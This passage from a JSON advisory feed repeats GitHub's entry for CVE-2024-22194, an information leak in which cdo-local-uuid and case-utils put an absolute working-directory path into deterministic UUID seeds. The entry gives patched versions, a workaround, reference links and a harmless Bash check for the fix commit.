href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10\">https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790\">https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2\">https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5\">https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d\">https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1\">https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452\">https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509\">https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/advisories/GHSA-rgrf-6mf5-m882</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882",
            "title": "[case-utils] cdo-local-uuid vulnerable to insertion of artifact derived from developer's Present Working Directory into demonstration code",
            "date_modified": "2024-01-11T15:18:52.000Z",
            "date_published": "2024-01-11T15:18:51.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rgrf-6mf5-m882"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p><em>What kind of vulnerability is it? Who is impacted?</em></p>\n<p>An information leakage vulnerability is present in <a href=\"https://pypi.org/project/cdo-local-uuid/\"><code>cdo-local-uuid</code></a> at version <code>0.4.0</code>, and in <a href=\"https://pypi.org/project/case-utils/\"><code>case-utils</code></a> in unpatched versions (matching the pattern <code>0.x.0</code>) at and since <code>0.5.0</code>, before <code>0.15.0</code>.</p>\n<p>The vulnerability stems from a Python function, <code>cdo_local_uuid.local_uuid()</code>, and its original implementation <code>case_utils.local_uuid()</code>.  Henceforth, both will be called <code>local_uuid()</code>.</p>\n<p><code>local_uuid()</code> generates UUIDv5s using a deterministic pseudorandom number stream.  This was written to make graph application demonstrations generate consistent, version-controllable output with minimal noise caused by demonstration re-runs.  Part of the information used to keep individual examples' generated output distinct from one another is seed information from the caller's environment, particularly the program's argument vector.  The present working directory is also included as part of the seed information, but for reasons including maintaining user environment privacy, as well as keeping generated identifiers consistent regardless of where a source tree is housed on a user's file system, the present working directory is trimmed from the left to exclude path information outside of a supplied \"Top\" source directory.  (In context of the Make scripting language, this \"top\" directory is typically in a variable called <code>top_srcdir</code>.  In context of Git-based project management, this directory is expected to be the root directory of a freshly \"Cloned\" project, e.g., where <code>.git</code> is stored.)</p>\n<p>Under certain conditions, a user's present working directory, as an absolute path, was incorporated into seed data for the <code>local_uuid()</code> deterministic pseudorandom number stream.  This violates an expectation made in the documented purpose of the <code>local_uuid()</code> function, and leaks information about a calling user's environment.</p>\n<p>The conditions are:</p>\n<ul>\n<li>Given a project with top source directory <code>top_srcdir</code>, for instance <code>/home/user1/Documents/Project1</code>;</li>\n<li>Given a Python script housed directly in <code>top_srcdir</code>, for instance at <code>${top_srcdir}/example.py</code>, written to support the deterministic mode of <code>local_uuid()</code>;</li>\n<li>Given a call to that Python script that follows the documentation for <code>local_uuid()</code>;</li>\n</ul>\n<p>The absolute path for <code>top_srcdir</code> was then included in the seed information for the UUIDv5 stream, when what was intended was a relative path spelling.  That is, instead of <code>./example.py</code> being in the seed data, <code>/home/user1/Documents/Project1/example.py</code> was in the seed data.</p>\n<p>This does not leak the present working directory directly.  But, given other knowledge of how a program had been called to generate data using <code>local_uuid()</code> under these conditions, it becomes possible to determine that a chosen path can lead to a known UUIDv5 value.  Note that it is not necessarily knowable that the chosen path is the <em>only</em> solution to a sequence reconstruction; but, the path can be confirmed to be <em>a</em> solution.</p>\n<h3 id=\"patches\">Patches</h3>\n<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>\n<p>The issue has been patched, in the <code>cdo-local-uuid</code> source repository and the <code>case-utils</code> source repository.</p>\n<p>Users should upgrade to any of these versions minimally:</p>\n<ul>\n<li><code>case-utils == 0.5.1</code></li>\n<li><code>case-utils == 0.6.1</code></li>\n<li><code>case-utils == 0.7.1</code></li>\n<li><code>case-utils == 0.8.1</code></li>\n<li><code>case-utils == 0.9.1</code></li>\n<li><code>case-utils == 0.10.1</code></li>\n<li><code>case-utils == 0.11.1</code></li>\n<li><code>case-utils == 0.12.1</code></li>\n<li><code>case-utils == 0.13.1</code></li>\n<li><code>case-utils == 0.14.1</code></li>\n<li><code>case-utils &gt;= 0.15.0</code></li>\n<li><code>cdo-local-uuid == 0.5.0</code></li>\n</ul>\n<p>All <code>case-utils</code> releases that contain the patch have the commit <code>ea630cce66b26dae6d7fa7e02451d6e25456a5f2</code> in their Git history.  Anyone interested in confirming the presence of this commit in a certain branch or tag can run the following test (written in Bash), substituting the desired branch name for the assigned value of <code>my_git_ref_of_interest</code>:</p>\n<pre><code class=\"language-bash\">#!/bin/bash\n# Present working directory ($PWD) should be in a clone of this repository:\n# https://github.com/casework/CASE-Utilities-Python\nmy_git_ref_of_interest=main\ntest \\\n  \"xea630cce66b26dae6d7fa7e02451d6e25456a5f2\" \\\n  == \\\n  \"x$(git merge-base ea630cc ${my_git_ref_of_interest})\"\necho $?  # Should print '0'\n</code></pre>\n<p>Note that other releases have been posted atop some of those minimal versions recommended for upgrading, named, e.g., <code>0.5.1.post0</code>.  These releases were posted to update internal library version numbers, and otherwise contain no functional changes, in accordance with Python Packaging guidance:</p>\n<ul>\n<li><a href=\"https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators\">https://packaging.python.org/en/latest/specifications/version-specifiers/#post-release-separators</a></li>\n</ul>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>\n<p>If the script calling <code>cdo_local_uuid.local_uuid()</code> is moved out of the \"Top\" source directory, the issue is addressed.</p>\n<h3 id=\"references\">References</h3>\n<p><em>Are there any links users can visit to find out more?</em></p>\n<p>The issue is addressed in this Pull Request:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n</ul>\n<p>Tests to reproduce the issue's conditions and confirm it has been addressed are in this Pull Requested:</p>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n</ul>\n\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-22194\">https://nvd.nist.gov/vuln/detail/CVE-2024-22194</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4</a></li>\n<li><a href=\"https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235\">https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9\">https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9</a></li>\n<li><a href=\"https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b\">https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b</a></li>\n<li><a 